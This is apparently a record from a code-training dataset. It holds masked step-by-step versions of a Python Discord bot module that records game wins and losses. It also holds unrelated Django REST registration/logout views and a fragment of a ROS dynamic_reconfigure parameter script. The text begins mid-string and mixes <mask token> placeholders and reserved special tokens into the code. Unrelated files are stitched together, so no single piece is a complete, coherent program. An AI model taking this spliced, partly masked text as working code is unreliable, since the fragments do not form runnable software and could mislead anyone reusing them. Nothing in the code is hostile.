winRate[0:4].rjust(9)\n playerString += (playerName + winCount + loseCount + winRate +\n ' %\\n')\n namePaddingLen = roundMultiple(maxPlayerLen + 2, 2)\n header = ' |' + 'Name'.center(namePaddingLen\n ) + '| Wins | Losses | Win Rate |\\n'\n divider = '-' * len(header) + '\\n'\n sendString = '```md\\n' + header + divider + playerString + '```'\n if len(returnMsg) > 0:\n returnMsg = returnMsg + sendString\n return returnMsg\n return sendString\n",
"step-2": "<mask token>\n\n\ndef roundMultiple(num, multiple):\n if num % multiple:\n return num + (multiple - num % multiple)\n return num\n\n\ndef findDuplicates(inputList):\n dupList = [k for k, v in Counter(inputList).items() if v > 1]\n return dupList\n\n\ndef incrementStats(msgChannel, statsFile, winner, losers):\n data = readDB(statsFile)\n if data == 0:\n return ERROR_DB_NOT_FOUND\n rows = data.rows\n if getIndex(winner, rows) < 0:\n print('[ERROR] Winner \"%s\" not found in database' % winner)\n return ERROR_PLAYER_NOT_FOUND % winner\n for loser in losers:\n loserIndex = getIndex(loser, rows)\n if loser == winner:\n print('[ERROR] Winner duplicated in losers field')\n return ERROR_WIN_IN_LOSE % loser\n if loserIndex < 0:\n print('[ERROR] Loser \"%s\" not found in database' % loser)\n return ERROR_PLAYER_NOT_FOUND % loser\n dupList = findDuplicates(losers)\n if len(dupList) > 0:\n print('[ERROR] Duplicate losers found')\n return ERROR_DUP_LOSER % dupList\n winnerIndex = getIndex(winner, rows)\n winnerVal = int(rows[winnerIndex][1])\n rows[winnerIndex][1] = str(winnerVal + 1)\n for loser in losers:\n loserIndex = getIndex(loser, rows)\n loserVal = int(rows[loserIndex][2])\n rows[loserIndex][2] = str(loserVal + 1)\n if writeDB(statsFile, data.headers, rows):\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n\n\ndef editPlayer(msgChannel, statsFile, player, editType, wins='0', losses='0'):\n data = readDB(statsFile)\n if data == 0:\n return ERROR_DB_NOT_FOUND\n rows = data.rows\n playerIndex = getIndex(player, rows)\n if editType == 'ADD':\n if playerIndex > -1:\n print('[ERROR] \"%s\" already in database' % player)\n print('[INFO] Database not updated')\n return ERROR_IN_DB % player\n else:\n rows.append([player, wins, losses])\n rows.sort(key=lambda name: name[0].capitalize())\n if writeDB(statsFile, data.headers, rows):\n print('[INFO] \"%s\" added to database' % player)\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n elif editType == 'EDIT':\n if playerIndex < 0:\n print('[ERROR] \"%s\" not found in database' % player)\n print('[INFO] Database not updated')\n return ERROR_PLAYER_NOT_FOUND % player\n else:\n rows[playerIndex] = [rows[playerIndex][0], wins, losses]\n if writeDB(statsFile, data.headers, rows):\n print(\"[INFO] %s's data changed\" % player)\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n elif editType == 'REMOVE':\n if playerIndex < 0:\n print('[ERROR] \"%s\" not found in database' % player)\n print('[INFO] Database not updated')\n return ERROR_PLAYER_NOT_FOUND % player\n else:\n del rows[playerIndex]\n if writeDB(statsFile, data.headers, rows):\n print('[INFO] \"%s\" removed from database' % player)\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n\n\ndef dumpStats(msgChannel, statsFile, sortType='WINRATE', player='ALL'):\n data = readDB(statsFile)\n if data == 0:\n return ERROR_DB_NOT_FOUND\n rows = data.rows\n print('[INFO] Sort type is %s' % sortType)\n returnMsg = ''\n if sortType == 'WINRATE' or sortType == 'NONE':\n try:\n rows.sort(key=lambda rate: float(rate[1]) / (float(rate[1]) +\n float(rate[2])), reverse=True)\n except ZeroDivisionError:\n print(\n '[ERROR] Tried to divide by zero because of blank player data')\n returnMsg = ERROR_SORT_ERROR\n elif sortType == 'WINS':\n rows.sort(key=lambda wins: float(wins[1]), reverse=True)\n elif sortType == 'LOSSES':\n rows.sort(key=lambda losses: float(losses[2]), reverse=True)\n elif sortType == 'NAME':\n pass\n else:\n print(\n '[ERROR] Invalid sorting type specified. Displaying stats as stored'\n )\n returnMsg = ERROR_INVALID_SORT\n if player == 'ALL':\n maxPlayerLen = 0\n for player in rows:\n if len(player[0]) > maxPlayerLen:\n maxPlayerLen = len(player[0])\n playerString = ''\n startSpace = 4 if maxPlayerLen % 2 else 3\n for player in rows:\n playerName = player[0].capitalize().rjust(maxPlayerLen + startSpace\n )\n winCount = player[1].rjust(7)\n loseCount = player[2].rjust(9)\n if float(winCount) <= 0:\n winRate = '0'\n elif float(loseCount) <= 0:\n winRate = ' 100'\n else:\n winRate = str(float(winCount) / (float(winCount) + float(\n loseCount)) * 100)\n winRate = winRate[0:4].rjust(9)\n playerString += (playerName + winCount + loseCount + winRate +\n ' %\\n')\n namePaddingLen = roundMultiple(maxPlayerLen + 2, 2)\n header = ' |' + 'Name'.center(namePaddingLen\n ) + '| Wins | Losses | Win Rate |\\n'\n divider = '-' * len(header) + '\\n'\n sendString = '```md\\n' + header + divider + playerString + '```'\n if len(returnMsg) > 0:\n returnMsg = returnMsg + sendString\n return returnMsg\n return sendString\n",
"step-3": "<mask token>\n\n\ndef getIndex(name, searchList):\n for i in range(0, len(searchList)):\n if name in searchList[i]:\n return i\n return -1\n\n\ndef roundMultiple(num, multiple):\n if num % multiple:\n return num + (multiple - num % multiple)\n return num\n\n\ndef findDuplicates(inputList):\n dupList = [k for k, v in Counter(inputList).items() if v > 1]\n return dupList\n\n\ndef incrementStats(msgChannel, statsFile, winner, losers):\n data = readDB(statsFile)\n if data == 0:\n return ERROR_DB_NOT_FOUND\n rows = data.rows\n if getIndex(winner, rows) < 0:\n print('[ERROR] Winner \"%s\" not found in database' % winner)\n return ERROR_PLAYER_NOT_FOUND % winner\n for loser in losers:\n loserIndex = getIndex(loser, rows)\n if loser == winner:\n print('[ERROR] Winner duplicated in losers field')\n return ERROR_WIN_IN_LOSE % loser\n if loserIndex < 0:\n print('[ERROR] Loser \"%s\" not found in database' % loser)\n return ERROR_PLAYER_NOT_FOUND % loser\n dupList = findDuplicates(losers)\n if len(dupList) > 0:\n print('[ERROR] Duplicate losers found')\n return ERROR_DUP_LOSER % dupList\n winnerIndex = getIndex(winner, rows)\n winnerVal = int(rows[winnerIndex][1])\n rows[winnerIndex][1] = str(winnerVal + 1)\n for loser in losers:\n loserIndex = getIndex(loser, rows)\n loserVal = int(rows[loserIndex][2])\n rows[loserIndex][2] = str(loserVal + 1)\n if writeDB(statsFile, data.headers, rows):\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n\n\ndef editPlayer(msgChannel, statsFile, player, editType, wins='0', losses='0'):\n data = readDB(statsFile)\n if data == 0:\n return ERROR_DB_NOT_FOUND\n rows = data.rows\n playerIndex = getIndex(player, rows)\n if editType == 'ADD':\n if playerIndex > -1:\n print('[ERROR] \"%s\" already in database' % player)\n print('[INFO] Database not updated')\n return ERROR_IN_DB % player\n else:\n rows.append([player, wins, losses])\n rows.sort(key=lambda name: name[0].capitalize())\n if writeDB(statsFile, data.headers, rows):\n print('[INFO] \"%s\" added to database' % player)\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n elif editType == 'EDIT':\n if playerIndex < 0:\n print('[ERROR] \"%s\" not found in database' % player)\n print('[INFO] Database not updated')\n return ERROR_PLAYER_NOT_FOUND % player\n else:\n rows[playerIndex] = [rows[playerIndex][0], wins, losses]\n if writeDB(statsFile, data.headers, rows):\n print(\"[INFO] %s's data changed\" % player)\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n elif editType == 'REMOVE':\n if playerIndex < 0:\n print('[ERROR] \"%s\" not found in database' % player)\n print('[INFO] Database not updated')\n return ERROR_PLAYER_NOT_FOUND % player\n else:\n del rows[playerIndex]\n if writeDB(statsFile, data.headers, rows):\n print('[INFO] \"%s\" removed from database' % player)\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n\n\ndef dumpStats(msgChannel, statsFile, sortType='WINRATE', player='ALL'):\n data = readDB(statsFile)\n if data == 0:\n return ERROR_DB_NOT_FOUND\n rows = data.rows\n print('[INFO] Sort type is %s' % sortType)\n returnMsg = ''\n if sortType == 'WINRATE' or sortType == 'NONE':\n try:\n rows.sort(key=lambda rate: float(rate[1]) / (float(rate[1]) +\n float(rate[2])), reverse=True)\n except ZeroDivisionError:\n print(\n '[ERROR] Tried to divide by zero because of blank player data')\n returnMsg = ERROR_SORT_ERROR\n elif sortType == 'WINS':\n rows.sort(key=lambda wins: float(wins[1]), reverse=True)\n elif sortType == 'LOSSES':\n rows.sort(key=lambda losses: float(losses[2]), reverse=True)\n elif sortType == 'NAME':\n pass\n else:\n print(\n '[ERROR] Invalid sorting type specified. Displaying stats as stored'\n )\n returnMsg = ERROR_INVALID_SORT\n if player == 'ALL':\n maxPlayerLen = 0\n for player in rows:\n if len(player[0]) > maxPlayerLen:\n maxPlayerLen = len(player[0])\n playerString = ''\n startSpace = 4 if maxPlayerLen % 2 else 3\n for player in rows:\n playerName = player[0].capitalize().rjust(maxPlayerLen + startSpace\n )\n winCount = player[1].rjust(7)\n loseCount = player[2].rjust(9)\n if float(winCount) <= 0:\n winRate = '0'\n elif float(loseCount) <= 0:\n winRate = ' 100'\n else:\n winRate = str(float(winCount) / (float(winCount) + float(\n loseCount)) * 100)\n winRate = winRate[0:4].rjust(9)\n playerString += (playerName + winCount + loseCount + winRate +\n ' %\\n')\n namePaddingLen = roundMultiple(maxPlayerLen + 2, 2)\n header = ' |' + 'Name'.center(namePaddingLen\n ) + '| Wins | Losses | Win Rate |\\n'\n divider = '-' * len(header) + '\\n'\n sendString = '```md\\n' + header + divider + playerString + '```'\n if len(returnMsg) > 0:\n returnMsg = returnMsg + sendString\n return returnMsg\n return sendString\n",
"step-4": "<mask token>\nINFO_DB_SUCCESS = 'Database updated successfully!'\nERROR_DB_ERROR = 'Error: Unable to open database for writing'\nERROR_DB_NOT_FOUND = (\n 'Error: Database for specified game does not exist. Check your spelling or use !addgame first.'\n )\nERROR_PLAYER_NOT_FOUND = (\n 'Error: \"%s\" not found in database. Check your spelling or use !addplayer first.'\n )\nERROR_WIN_IN_LOSE = 'Error: \"%s\" already specified as winner.'\nERROR_DUP_LOSER = 'Error: \"%s\" duplicated in losers list'\nERROR_IN_DB = 'Error: \"%s\" is already in the database'\nERROR_SORT_ERROR = \"\"\"Error while sorting list. Make sure all players have at least one win or loss.\n\"\"\"\nERROR_INVALID_SORT = (\n 'Error: Invalid sorting type. Displaying stats as stored.\\n')\n\n\ndef getIndex(name, searchList):\n for i in range(0, len(searchList)):\n if name in searchList[i]:\n return i\n return -1\n\n\ndef roundMultiple(num, multiple):\n if num % multiple:\n return num + (multiple - num % multiple)\n return num\n\n\ndef findDuplicates(inputList):\n dupList = [k for k, v in Counter(inputList).items() if v > 1]\n return dupList\n\n\ndef incrementStats(msgChannel, statsFile, winner, losers):\n data = readDB(statsFile)\n if data == 0:\n return ERROR_DB_NOT_FOUND\n rows = data.rows\n if getIndex(winner, rows) < 0:\n print('[ERROR] Winner \"%s\" not found in database' % winner)\n return ERROR_PLAYER_NOT_FOUND % winner\n for loser in losers:\n loserIndex = getIndex(loser, rows)\n if loser == winner:\n print('[ERROR] Winner duplicated in losers field')\n return ERROR_WIN_IN_LOSE % loser\n if loserIndex < 0:\n print('[ERROR] Loser \"%s\" not found in database' % loser)\n return ERROR_PLAYER_NOT_FOUND % loser\n dupList = findDuplicates(losers)\n if len(dupList) > 0:\n print('[ERROR] Duplicate losers found')\n return ERROR_DUP_LOSER % dupList\n winnerIndex = getIndex(winner, rows)\n winnerVal = int(rows[winnerIndex][1])\n rows[winnerIndex][1] = str(winnerVal + 1)\n for loser in losers:\n loserIndex = getIndex(loser, rows)\n loserVal = int(rows[loserIndex][2])\n rows[loserIndex][2] = str(loserVal + 1)\n if writeDB(statsFile, data.headers, rows):\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n\n\ndef editPlayer(msgChannel, statsFile, player, editType, wins='0', losses='0'):\n data = readDB(statsFile)\n if data == 0:\n return ERROR_DB_NOT_FOUND\n rows = data.rows\n playerIndex = getIndex(player, rows)\n if editType == 'ADD':\n if playerIndex > -1:\n print('[ERROR] \"%s\" already in database' % player)\n print('[INFO] Database not updated')\n return ERROR_IN_DB % player\n else:\n rows.append([player, wins, losses])\n rows.sort(key=lambda name: name[0].capitalize())\n if writeDB(statsFile, data.headers, rows):\n print('[INFO] \"%s\" added to database' % player)\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n elif editType == 'EDIT':\n if playerIndex < 0:\n print('[ERROR] \"%s\" not found in database' % player)\n print('[INFO] Database not updated')\n return ERROR_PLAYER_NOT_FOUND % player\n else:\n rows[playerIndex] = [rows[playerIndex][0], wins, losses]\n if writeDB(statsFile, data.headers, rows):\n print(\"[INFO] %s's data changed\" % player)\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n elif editType == 'REMOVE':\n if playerIndex < 0:\n print('[ERROR] \"%s\" not found in database' % player)\n print('[INFO] Database not updated')\n return ERROR_PLAYER_NOT_FOUND % player\n else:\n del rows[playerIndex]\n if writeDB(statsFile, data.headers, rows):\n print('[INFO] \"%s\" removed from database' % player)\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n\n\ndef dumpStats(msgChannel, statsFile, sortType='WINRATE', player='ALL'):\n data = readDB(statsFile)\n if data == 0:\n return ERROR_DB_NOT_FOUND\n rows = data.rows\n print('[INFO] Sort type is %s' % sortType)\n returnMsg = ''\n if sortType == 'WINRATE' or sortType == 'NONE':\n try:\n rows.sort(key=lambda rate: float(rate[1]) / (float(rate[1]) +\n float(rate[2])), reverse=True)\n except ZeroDivisionError:\n print(\n '[ERROR] Tried to divide by zero because of blank player data')\n returnMsg = ERROR_SORT_ERROR\n elif sortType == 'WINS':\n rows.sort(key=lambda wins: float(wins[1]), reverse=True)\n elif sortType == 'LOSSES':\n rows.sort(key=lambda losses: float(losses[2]), reverse=True)\n elif sortType == 'NAME':\n pass\n else:\n print(\n '[ERROR] Invalid sorting type specified. Displaying stats as stored'\n )\n returnMsg = ERROR_INVALID_SORT\n if player == 'ALL':\n maxPlayerLen = 0\n for player in rows:\n if len(player[0]) > maxPlayerLen:\n maxPlayerLen = len(player[0])\n playerString = ''\n startSpace = 4 if maxPlayerLen % 2 else 3\n for player in rows:\n playerName = player[0].capitalize().rjust(maxPlayerLen + startSpace\n )\n winCount = player[1].rjust(7)\n loseCount = player[2].rjust(9)\n if float(winCount) <= 0:\n winRate = '0'\n elif float(loseCount) <= 0:\n winRate = ' 100'\n else:\n winRate = str(float(winCount) / (float(winCount) + float(\n loseCount)) * 100)\n winRate = winRate[0:4].rjust(9)\n playerString += (playerName + winCount + loseCount + winRate +\n ' %\\n')\n namePaddingLen = roundMultiple(maxPlayerLen + 2, 2)\n header = ' |' + 'Name'.center(namePaddingLen\n ) + '| Wins | Losses | Win Rate |\\n'\n divider = '-' * len(header) + '\\n'\n sendString = '```md\\n' + header + divider + playerString + '```'\n if len(returnMsg) > 0:\n returnMsg = returnMsg + sendString\n return returnMsg\n return sendString\n",
"step-5": "import discord\nfrom collections import Counter\nfrom db import readDB, writeDB\n\n\nINFO_DB_SUCCESS = 'Database updated successfully!'\nERROR_DB_ERROR = 'Error: Unable to open database for writing'\nERROR_DB_NOT_FOUND = 'Error: Database for specified game does not exist. Check your spelling or use !addgame first.'\n\nERROR_PLAYER_NOT_FOUND = 'Error: \\\"%s\\\" not found in database. Check your spelling or use !addplayer first.'\nERROR_WIN_IN_LOSE = 'Error: \\\"%s\\\" already specified as winner.'\nERROR_DUP_LOSER = 'Error: \\\"%s\\\" duplicated in losers list'\n\nERROR_IN_DB = 'Error: \\\"%s\\\" is already in the database'\n\nERROR_SORT_ERROR = 'Error while sorting list. Make sure all players have at least one win or loss.\\n'\nERROR_INVALID_SORT = 'Error: Invalid sorting type. Displaying stats as stored.\\n'\n\n\n# desc: function to search a list of lists for a name\n# args: name - the name to search the lists for\n# searchList - a list of lists to search for a name\n# retn: the index of the list containing the name or -1 if not found\ndef getIndex(name, searchList):\n for i in range(0, len(searchList)):\n if name in searchList[i]:\n return i\n return -1\n\n\n# desc: function to round a number up to a specific increment. for example,\n# rounding 11 to the nearest multiple of 2 would result in 12\n# args: num - the number to round up\n# multiple - the increment to round to\n# retn: the rounded number\ndef roundMultiple(num, multiple):\n if num % multiple:\n return num + (multiple - (num % multiple))\n return num\n\n\n# desc: function to find duplicate items in a list\n# args: inputList - a list to search for duplicates\n# retn: a list containing the duplicates\ndef findDuplicates(inputList):\n dupList = [k for k, v in Counter(inputList).items() if v > 1]\n return dupList\n\n\n# desc: function to update the database\n# args: msgChannel - the channel the invoking message was sent from\n# statsFile - the name of the database file\n# winner - a string containing the winner's name\n# losers - a list of strings containing the losers' names\n# retn: a string indicating success or failure\ndef incrementStats(msgChannel, statsFile, winner, losers):\n # read the database\n data = readDB(statsFile)\n # return an error if database not found\n if data == 0:\n return ERROR_DB_NOT_FOUND\n rows = data.rows\n\n # check if the winner is actually in the database\n if getIndex(winner, rows) < 0:\n print('[ERROR] Winner \\\"%s\\\" not found in database' % winner)\n return (ERROR_PLAYER_NOT_FOUND % winner)\n\n # check if losers are in database\n for loser in losers:\n # get loser index\n loserIndex = getIndex(loser, rows)\n\n # check against winner to see if the name was duplicated\n if loser == winner:\n print('[ERROR] Winner duplicated in losers field')\n return (ERROR_WIN_IN_LOSE % loser)\n # check if loser was not found in database\n if loserIndex < 0:\n print('[ERROR] Loser \\\"%s\\\" not found in database' % loser)\n return (ERROR_PLAYER_NOT_FOUND % loser)\n\n # check for duplicate losers\n dupList = findDuplicates(losers)\n if len(dupList) > 0:\n print('[ERROR] Duplicate losers found')\n return (ERROR_DUP_LOSER % dupList)\n\n # update stats if we found the winner and all losers\n # get index, get win count, increment and update\n winnerIndex = getIndex(winner, rows)\n winnerVal = int(rows[winnerIndex][1])\n rows[winnerIndex][1] = str(winnerVal + 1)\n\n # same as winner for each loser\n for loser in losers:\n loserIndex = getIndex(loser, rows)\n loserVal = int(rows[loserIndex][2])\n rows[loserIndex][2] = str(loserVal + 1)\n\n # write the new data to the database file\n if writeDB(statsFile, data.headers, rows):\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n\n\n# desc: function to add a player to the database or edit an existing player\n# args: msgChannel - the channel the invoking message was sent from\n# statsFile - the name of the database file\n# player - the name of the player to either add to the db or edit\n# editType - either 'ADD' or 'EDIT' or 'REMOVE' - sets type of change happening\n# wins - the number of wins to assign the player\n# losses - the number of losses to assign the player\n# retn: a string indicating success or failure\ndef editPlayer(msgChannel, statsFile, player, editType, wins='0', losses='0'):\n # open up the database\n data = readDB(statsFile)\n # return an error if database not found\n if data == 0:\n return ERROR_DB_NOT_FOUND\n rows = data.rows\n playerIndex = getIndex(player, rows)\n\n # check if player is already in database\n if editType == 'ADD':\n if playerIndex > -1:\n print('[ERROR] \\\"%s\\\" already in database' % player)\n print('[INFO] Database not updated')\n return (ERROR_IN_DB % player)\n else:\n # add player to list and resort\n rows.append([player, wins, losses])\n rows.sort(key=lambda name: name[0].capitalize())\n\n # write the new data to the database file\n if writeDB(statsFile, data.headers, rows):\n print('[INFO] \\\"%s\\\" added to database' % player)\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n elif editType == 'EDIT':\n if playerIndex < 0:\n print('[ERROR] \\\"%s\\\" not found in database' % player)\n print('[INFO] Database not updated')\n return (ERROR_PLAYER_NOT_FOUND % player)\n else:\n rows[playerIndex] = [rows[playerIndex][0], wins, losses]\n\n # write the new data to the database file\n if writeDB(statsFile, data.headers, rows):\n print('[INFO] %s\\'s data changed' % player)\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n elif editType == 'REMOVE':\n if playerIndex < 0:\n print('[ERROR] \\\"%s\\\" not found in database' % player)\n print('[INFO] Database not updated')\n return (ERROR_PLAYER_NOT_FOUND % player)\n else:\n # delete player from list\n del(rows[playerIndex])\n # write the new data to the database\n if writeDB(statsFile, data.headers, rows):\n print('[INFO] \\\"%s\\\" removed from database' % player)\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n\n\n# desc: function to display the stats\n# args: msgChannel - the channel the invoking message was sent from\n# statsFile - the name of the database file\n# sortType - the order in which the results should be sorted.\n# options are 'WINRATE', 'WINS', 'LOSSES', or 'NAME'.\n# will revert to 'NAME' if invalid\n# player - NOT IMPLEMENTED - the player to display stats for\n# retn: a string formatted with the database stats\ndef dumpStats(msgChannel, statsFile, sortType='WINRATE', player='ALL'):\n # read database\n data = readDB(statsFile)\n # return an error if database not found\n if data == 0:\n return ERROR_DB_NOT_FOUND\n rows = data.rows\n\n print('[INFO] Sort type is %s' % sortType)\n returnMsg = ''\n if sortType == 'WINRATE' or sortType == 'NONE':\n # sort data by win rate\n try:\n rows.sort(key=lambda rate: float(rate[1]) / (float(rate[1]) + float(rate[2])), reverse=True)\n except ZeroDivisionError:\n print('[ERROR] Tried to divide by zero because of blank player data')\n returnMsg = ERROR_SORT_ERROR\n elif sortType == 'WINS':\n # sort by number of wins and reverse so max is first\n rows.sort(key=lambda wins: float(wins[1]), reverse=True)\n elif sortType == 'LOSSES':\n # sort by number of losses and reverse so max is first\n rows.sort(key=lambda losses: float(losses[2]), reverse=True)\n elif sortType == 'NAME':\n # database is stored sorted by name so dont do anything\n pass\n else:\n print('[ERROR] Invalid sorting type specified. Displaying stats as stored')\n returnMsg = ERROR_INVALID_SORT\n\n if player == 'ALL':\n # get max player length\n maxPlayerLen = 0\n for player in rows:\n if len(player[0]) > maxPlayerLen:\n maxPlayerLen = len(player[0])\n\n # construct a string with all the player info\n playerString = ''\n # adjust start spacing if player length is odd or even to align with pipe\n startSpace = 4 if maxPlayerLen % 2 else 3\n for player in rows:\n playerName = player[0].capitalize().rjust(maxPlayerLen + startSpace)\n winCount = player[1].rjust(7)\n loseCount = player[2].rjust(9)\n # calculate win rate\n if float(winCount) <= 0:\n winRate = '0'\n elif float(loseCount) <= 0:\n winRate = ' 100'\n else:\n winRate = str((float(winCount) / (float(winCount) + float(loseCount))) * 100)\n\n # truncate win rate and create string with player info\n winRate = winRate[0:4].rjust(9)\n playerString += playerName + winCount + loseCount + winRate + ' %\\n'\n\n # calculate padding for name field and create header final strings\n namePaddingLen = roundMultiple((maxPlayerLen + 2), 2)\n header = ' |' + 'Name'.center(namePaddingLen) + '| Wins | Losses | Win Rate |\\n'\n divider = ('-' * len(header)) + '\\n'\n sendString = '```md\\n' + header + divider + playerString + '```'\n\n # return the constructed string\n if len(returnMsg) > 0:\n returnMsg = returnMsg + sendString\n return returnMsg\n return sendString\n",
"step-ids": [
4,
5,
6,
7,
9
]
}
|
[
4,
5,
6,
7,
9
] |
<|reserved_special_token_0|>
class LogoutView(APIView):
def get(self, request):
logout(request)
return Response({'response': 'logged out'}, status=status.HTTP_200_OK)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RegistrationView(APIView):
<|reserved_special_token_0|>
def post(self, request):
serilizer = UserSerializer(data=request.data)
if serilizer.is_valid():
account = serilizer.save()
user_name = serilizer.validated_data['user_name']
data = {'response': 'user with username ' + str(user_name) +
' created'}
data['key'] = get_object_or_404(Token, user=account).key
return Response(data, status=status.HTTP_201_CREATED)
else:
return Response(serilizer.errors, status=status.
HTTP_400_BAD_REQUEST)
class LogoutView(APIView):
def get(self, request):
logout(request)
return Response({'response': 'logged out'}, status=status.HTTP_200_OK)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RegistrationView(APIView):
serializer_class = UserSerializer
def post(self, request):
serilizer = UserSerializer(data=request.data)
if serilizer.is_valid():
account = serilizer.save()
user_name = serilizer.validated_data['user_name']
data = {'response': 'user with username ' + str(user_name) +
' created'}
data['key'] = get_object_or_404(Token, user=account).key
return Response(data, status=status.HTTP_201_CREATED)
else:
return Response(serilizer.errors, status=status.
HTTP_400_BAD_REQUEST)
class LogoutView(APIView):
def get(self, request):
logout(request)
return Response({'response': 'logged out'}, status=status.HTTP_200_OK)
<|reserved_special_token_1|>
from rest_framework.views import APIView
from django.shortcuts import get_object_or_404
from rest_framework.response import Response
from django.contrib.auth import logout
from rest_framework import status
from rest_framework.authtoken.models import Token
from .serilizer import UserSerializer
class RegistrationView(APIView):
serializer_class = UserSerializer
def post(self, request):
serilizer = UserSerializer(data=request.data)
if serilizer.is_valid():
account = serilizer.save()
user_name = serilizer.validated_data['user_name']
data = {'response': 'user with username ' + str(user_name) +
' created'}
data['key'] = get_object_or_404(Token, user=account).key
return Response(data, status=status.HTTP_201_CREATED)
else:
return Response(serilizer.errors, status=status.
HTTP_400_BAD_REQUEST)
class LogoutView(APIView):
def get(self, request):
logout(request)
return Response({'response': 'logged out'}, status=status.HTTP_200_OK)
<|reserved_special_token_1|>
from rest_framework.views import APIView
from django.shortcuts import get_object_or_404
from rest_framework.response import Response
from django.contrib.auth import logout
from rest_framework import status
from rest_framework.authtoken.models import Token
from .serilizer import UserSerializer
class RegistrationView(APIView):
serializer_class = UserSerializer
def post(self,request):
serilizer = UserSerializer(data= request.data)
if serilizer.is_valid():
account = serilizer.save()
user_name = serilizer.validated_data['user_name']
data = { 'response': "user with username " + str(user_name) + ' created'}
data['key'] = get_object_or_404(Token,user = account).key
return Response( data ,status = status.HTTP_201_CREATED )
else :
return Response(serilizer.errors,status = status.HTTP_400_BAD_REQUEST)
class LogoutView(APIView):
def get(self,request):
logout(request)
return Response({"response" : "logged out"},status=status.HTTP_200_OK)
|
flexible
|
{
"blob_id": "6a5a6bdb0740d51426aa8b36dd3cc317103412b1",
"index": 641,
"step-1": "<mask token>\n\n\nclass LogoutView(APIView):\n\n def get(self, request):\n logout(request)\n return Response({'response': 'logged out'}, status=status.HTTP_200_OK)\n",
"step-2": "<mask token>\n\n\nclass RegistrationView(APIView):\n <mask token>\n\n def post(self, request):\n serilizer = UserSerializer(data=request.data)\n if serilizer.is_valid():\n account = serilizer.save()\n user_name = serilizer.validated_data['user_name']\n data = {'response': 'user with username ' + str(user_name) +\n ' created'}\n data['key'] = get_object_or_404(Token, user=account).key\n return Response(data, status=status.HTTP_201_CREATED)\n else:\n return Response(serilizer.errors, status=status.\n HTTP_400_BAD_REQUEST)\n\n\nclass LogoutView(APIView):\n\n def get(self, request):\n logout(request)\n return Response({'response': 'logged out'}, status=status.HTTP_200_OK)\n",
"step-3": "<mask token>\n\n\nclass RegistrationView(APIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serilizer = UserSerializer(data=request.data)\n if serilizer.is_valid():\n account = serilizer.save()\n user_name = serilizer.validated_data['user_name']\n data = {'response': 'user with username ' + str(user_name) +\n ' created'}\n data['key'] = get_object_or_404(Token, user=account).key\n return Response(data, status=status.HTTP_201_CREATED)\n else:\n return Response(serilizer.errors, status=status.\n HTTP_400_BAD_REQUEST)\n\n\nclass LogoutView(APIView):\n\n def get(self, request):\n logout(request)\n return Response({'response': 'logged out'}, status=status.HTTP_200_OK)\n",
"step-4": "from rest_framework.views import APIView\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework.response import Response\nfrom django.contrib.auth import logout\nfrom rest_framework import status\nfrom rest_framework.authtoken.models import Token\nfrom .serilizer import UserSerializer\n\n\nclass RegistrationView(APIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serilizer = UserSerializer(data=request.data)\n if serilizer.is_valid():\n account = serilizer.save()\n user_name = serilizer.validated_data['user_name']\n data = {'response': 'user with username ' + str(user_name) +\n ' created'}\n data['key'] = get_object_or_404(Token, user=account).key\n return Response(data, status=status.HTTP_201_CREATED)\n else:\n return Response(serilizer.errors, status=status.\n HTTP_400_BAD_REQUEST)\n\n\nclass LogoutView(APIView):\n\n def get(self, request):\n logout(request)\n return Response({'response': 'logged out'}, status=status.HTTP_200_OK)\n",
"step-5": "from rest_framework.views import APIView\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework.response import Response\nfrom django.contrib.auth import logout\nfrom rest_framework import status\nfrom rest_framework.authtoken.models import Token\nfrom .serilizer import UserSerializer\n\nclass RegistrationView(APIView):\n serializer_class = UserSerializer\n\n def post(self,request):\n serilizer = UserSerializer(data= request.data)\n if serilizer.is_valid():\n account = serilizer.save()\n user_name = serilizer.validated_data['user_name']\n data = { 'response': \"user with username \" + str(user_name) + ' created'}\n data['key'] = get_object_or_404(Token,user = account).key\n return Response( data ,status = status.HTTP_201_CREATED )\n else :\n return Response(serilizer.errors,status = status.HTTP_400_BAD_REQUEST)\n\n\nclass LogoutView(APIView):\n def get(self,request):\n logout(request)\n return Response({\"response\" : \"logged out\"},status=status.HTTP_200_OK)",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
#!/usr/bin/env python
# set up parameters that we care about
PACKAGE = 'jsk_pcl_ros'
from dynamic_reconfigure.parameter_generator_catkin import *;
from math import pi
gen = ParameterGenerator ()
gen.add("segment_connect_normal_threshold", double_t, 0,
"threshold of normal to connect clusters", 0.9, 0.0, 1.0)
gen.add("ewma_tau", double_t, 0,
"tau parameter of EWMA to connect clusters", 0.2, 0.0, 1.0)
gen.add("outlier_threshold", double_t, 0, "outlier threshold", 0.01, 0.0, 0.1)
